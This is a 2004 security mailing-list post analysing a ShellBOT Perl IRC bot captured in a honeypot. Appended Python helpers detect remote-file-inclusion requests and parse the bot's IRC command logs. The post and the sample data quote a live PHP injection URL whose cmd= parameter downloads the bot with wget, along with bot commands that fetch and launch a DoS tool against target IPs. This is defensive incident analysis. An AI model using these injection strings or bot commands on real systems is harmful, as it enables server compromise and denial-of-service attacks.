Security Incidents mailing list archives
Systems compromised with ShellBOT perl script - part 2
From: Kirby Angell <kangell () alertra com>
Date: Fri, 03 Sep 2004 18:37:52 -0500
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

(note: This is a follow-up to "Systems compromised with ShellBOT perl script" posted on 20040901)

Introduction
------------

Two days ago we detected a strange Referer entry in our web logs. This morning we got almost the same Referer again:

http://www.DOMAIN.com/index.php?id=http://members.lycos.co.uk/gookboy/hkz.txt?&cmd=cd%20/tmp;wget%20http://members.lycos.co.uk/gookboy/.egg2

Attacking IP is still 63.227.76.25.

Attack involves servers, probably PHP, that do not properly sanitize variables and can be tricked into executing shell commands. The attack downloads and executes a Perl script (.egg2). The Perl script sets its process name to "[httpd]" to help it blend into the Apache threads. It connects to an IRC channel:

Server:   irc.mzima.net:6667
Channel:  #brdata (note: new channel from last time)
Nickname: goober+random int

The script listens for private messages that can instruct it to do simple portscans, DOS attacks, and execute shell commands with whatever permissions the web server has.

This time I was more prepared and have gathered more data on the script and what the bad guys are using it for. I have packaged the data into a .tar.gz file if anyone wants a copy of the whole thing including scripts.

Setup
-----

I modified the .egg2 script to neuter its portscan and DOS functions. The functions are still there, but they don't actually make any connections to remote servers. A "sleep" command attempts to make it look like something happened though. I purposefully left the shell command functional so I could see what commands they would run and not have them get too suspicious.

The script was put into a VMWare session with a RH9 install. iptables was configured to allow the outgoing 6667:tcp and to disallow just about everything else inbound and outbound. tcpdump was set up to capture all the traffic on the vmnet ethernet adapter outside of the VMWare session.

Results
-------

For several hours my rogue bot was undetected and captured at least one attempt to enlist it along with all the rest (not as many as last time, but several I notified 2 days ago) in an attack on a computer. Here is a summary of the private messages my bot received and responses (entries prefaced with -> are commands coming into the bot and those with <- are responses leaving the bot):

-> :^sly!~ssly () cedar invision net PRIVMSG #brdata :!atrix killall -9 doze4
<- PRIVMSG #brdata :doze4: no process killed

-> :^sly!~ssly () cedar invision net PRIVMSG #brdata :!atrix cd /tmp

-> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix rm doze4
<- PRIVMSG #brdata :rm: cannot lstat `doze4': No such file or directory

-> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix wget http://members.lycos.co.uk/gookboy/doze4
<- PRIVMSG #brdata :--13:52:35-- http://members.lycos.co.uk/gookboy/doze4
<- PRIVMSG #brdata : => `doze4'
<- PRIVMSG #brdata :Resolving members.lycos.co.uk... done.
<- PRIVMSG #brdata :Connecting to members.lycos.co.uk[212.78.204.20]:80... failed: Connection refused.

-> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix chmod +x doze4
<- PRIVMSG #brdata :chmod: failed to get attributes of `doze4': No such file or directory

-> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix ./doze4 81.29.36.147 53 www.ibm.com

-> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix killall -9 doze4

-> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix ./doze4 65.248.51.13 53 www.ibm.com
<- PRIVMSG #brdata :sh: line 1: ./doze4: No such file or directory

So the command sequence is: kill our program, delete our program, get new version of our program, instruct our program to attack.

In hindsight it was a mistake to not allow outgoing connections to at least their Lycos server. It drew attention to me and a few hours later, before any other attacks were tried, I was booted and the channel locked again.

Unfortunately it means that the IP address I used is now probably dead for recon on this attacker. I think they are unaware how I keep finding the channel they are using though. If I get another shot, I'll see if I can bounce the connection through another machine using an SSH tunnel. If someone wants to volunteer a computer for this purpose it would be most appreciated.

doze4
-----

I downloaded the "doze4" program and found it to be an ELF binary. Google didn't turn up the source code, but I have disassembled it. I'm not one with Linux assembly language, but it's not terribly long and seems to be a pretty basic DOS app. Not terribly sure why they didn't just use the one built into the script, but there is probably a good reason.

doze4 identifies itself as:

* * doze4 - written by phyton * *
doze4 rOckz! evite hosts.. use ips!
Usage: %s <ip> <porta> <spoof>
  <ip>    : endereço que deseja f***r. (address that it desires to f***r)
  <porta> : porta aperta (coloque 0, que é rOckz) (door presses (places 0, that he is rOckz))
  <spoof> : um ip para ser spoofado (sua mascara). (a to be spoofado IP (its masks))

doze4 as well as .egg2 was written by someone who speaks Portuguese.

Summary
-------

The same IP was used to initiate the attack both times. I notified the owner of that IP yesterday, but never received a response. Tonight I will be going through the list of compromised machines and notifying as many as possible of the problem.

The files:

doze4           ELF binary of DOS tool
doze4.asm       disassembled version of doze4
wget-doze4.cap  tcpdump capture of IRC session
egg2-live       dangerous version of IRC bot
egg2-neutered   egg2 with portscan and DOS disabled (but SHELL access is still live)
hkz.txt         PHP injection script
irclog.txt      text output of IRC connection
readme.txt      this file

are available in a .tar.gz file for anyone who requests it.

Tuesday night my test server was attacked with a SYN flood; I expect worse this time so I've locked it down so it will just log everything. We don't put this kind of thing on our production web servers, so just shoot me an email at kangell () alertra com if you want the archive.

-- 
Thank you,
Kirby Angell
Get notified anytime your website goes down!
http://www.alertra.com
key: 9004F4C0
fingerprint: DD7E E88D 7F50 2A1E 229D 836A DB5B A751 9004 F4C0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFBOQBQ21unUZAE9MARApnkAKCUicL19u64sXZUw4CHkybDmEJ1HQCeKKRj
l/dzGuRlVQ7TneVqdErV+7c=
=WY/A
-----END PGP SIGNATURE-----
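Two detection helpers for the artefacts described in the post above, added here as an example and not part of the original message or the author's archive: one scans web server access logs for the PHP remote-file-inclusion request pattern (a query parameter whose value is a remote URL, and a cmd= parameter carrying shell metacharacters), the other reconstructs the bot's command/response sequence from an IRC log in the post's "->"/"<-" notation. The access-log and IRC lines are constructed to match the shapes quoted in the post (the web server host is a placeholder, and hostmasks keep the archive's "user () host" obfuscation); all function names are this example's own.

```python
"""Defender-side helpers for the two artefacts in the post: the PHP
remote-file-inclusion request seen in the web logs, and the IRC PRIVMSG
command/response traffic captured from the neutered bot.

Added example, not code from the original post.  Sample lines are
constructed from the shapes quoted in the post; function names are ours.
"""
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed Apache combined-format access log lines.  The first carries the
# request quoted in the post; the second is an ordinary request for contrast.
SAMPLE_ACCESS_LOG = [
    '63.227.76.25 - - [03/Sep/2004:08:12:01 -0500] "GET /index.php?id=http://members.lycos.co.uk/gookboy/hkz.txt?&cmd=cd%20/tmp;wget%20http://members.lycos.co.uk/gookboy/.egg2 HTTP/1.0" 200 512 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [03/Sep/2004:08:12:05 -0500] "GET /index.php?id=42 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
REMOTE_SCHEME_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)
SHELL_META_RE = re.compile(r'[;|&`$]')


def split_query(query):
    """Split a raw query string on '&' only and percent-decode each side.

    Done by hand rather than with parse_qsl because older Pythons also split
    on ';', which would hide the 'cd /tmp;wget ...' payload from the check.
    """
    params = []
    for pair in query.split('&'):
        if not pair:
            continue
        key, _, value = pair.partition('=')
        params.append((unquote_plus(key), unquote_plus(value)))
    return params


def find_rfi_requests(lines):
    """Flag requests whose query parameters point at a remote URL (the
    include-a-script-from-elsewhere pattern) or carry shell metacharacters
    (the cmd= pattern).  One finding per suspicious parameter."""
    findings = []
    for line in lines:
        m = ACCESS_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group('target')).query
        for key, value in split_query(query):
            if REMOTE_SCHEME_RE.match(value):
                reason = 'remote-url'
            elif SHELL_META_RE.search(value):
                reason = 'shell-metachar'
            else:
                continue
            findings.append({'ip': m.group('ip'), 'time': m.group('ts'),
                             'param': key, 'reason': reason, 'value': value})
    return findings


# Constructed excerpt of the IRC exchange in the post's notation: '->' lines
# arrive at the bot, '<-' lines leave it.  The last line is ordinary channel
# chatter, added to show that only '!<botnick> ...' messages are commands.
SAMPLE_IRC_LOG = [
    '-> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix rm doze4',
    "<- PRIVMSG #brdata :rm: cannot lstat `doze4': No such file or directory",
    '-> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix wget http://members.lycos.co.uk/gookboy/doze4',
    '<- PRIVMSG #brdata :--13:52:35-- http://members.lycos.co.uk/gookboy/doze4',
    '<- PRIVMSG #brdata :Connecting to members.lycos.co.uk[212.78.204.20]:80... failed: Connection refused.',
    '-> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix chmod +x doze4',
    "<- PRIVMSG #brdata :chmod: failed to get attributes of `doze4': No such file or directory",
    '-> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix ./doze4 81.29.36.147 53 www.ibm.com',
    '-> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :plain channel chatter, not a command',
]

INBOUND_RE = re.compile(
    r'^-> :(?P<nick>[^!\s]+)!.*? PRIVMSG (?P<target>\S+) :!(?P<bot>\S+) (?P<cmd>.+)$'
)
OUTBOUND_RE = re.compile(r'^<- PRIVMSG (?P<target>\S+) :(?P<text>.*)$')


def extract_bot_commands(lines):
    """Reconstruct the command sequence: each '!<botnick> <cmd>' message
    addressed to the bot, with the output lines it sent back before the
    next command.  Channel chatter that is not a command is ignored."""
    commands = []
    for line in lines:
        m = INBOUND_RE.match(line)
        if m:
            commands.append({'nick': m.group('nick'), 'target': m.group('target'),
                             'bot': m.group('bot'), 'command': m.group('cmd'),
                             'output': []})
            continue
        m = OUTBOUND_RE.match(line)
        if m and commands:
            commands[-1]['output'].append(m.group('text'))
    return commands


if __name__ == '__main__':
    for f in find_rfi_requests(SAMPLE_ACCESS_LOG):
        print(f"{f['time']} {f['ip']} param={f['param']} {f['reason']}: {f['value']}")
    for c in extract_bot_commands(SAMPLE_IRC_LOG):
        print(f"{c['nick']} -> {c['bot']}: {c['command']} ({len(c['output'])} output lines)")
```

Run against a real access log, `find_rfi_requests` reports the `id=http://...` include and the `cmd=` payload as two separate findings for the same request, which is what you want when triaging: the remote include alone is already a sign of an unsanitized include path even when no command parameter is present. `extract_bot_commands` keys on the `!<botnick>` prefix the post shows, so a different bot nickname in another capture only needs the same log notation to be reconstructed the same way.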
Current thread:
- Systems compromised with ShellBOT perl script - part 2 Kirby Angell (Sep 08)
- Re: Systems compromised with ShellBOT perl script - part 2 Shashank Rai (Sep 09)
- Re: Systems compromised with ShellBOT perl script - part 2 Kirby Angell (Sep 10)
- Re: Systems compromised with ShellBOT perl script - part 2 Kirby Angell (Sep 14)
- Re: Systems compromised with ShellBOT perl script - part 2 Andreia Gaita (Sep 10)
- Re: Systems compromised with ShellBOT perl script - part 2 Kirby Angell (Sep 08)
- Re: Systems compromised with ShellBOT perl script - part 2 Andreia Gaita (Sep 09)
- Re: Systems compromised with ShellBOT perl script - part 2 Kirby Angell (Sep 14)
- Re: Systems compromised with ShellBOT perl script - part 2 Kirby Angell (Sep 08)
- Re: Systems compromised with ShellBOT perl script - part 2 Shashank Rai (Sep 09)
- Re: Systems compromised with ShellBOT perl script - part 2 ASI (Sep 10)
- Re: Systems compromised with ShellBOT perl script - part 2 nathan c. dickerson (Sep 19)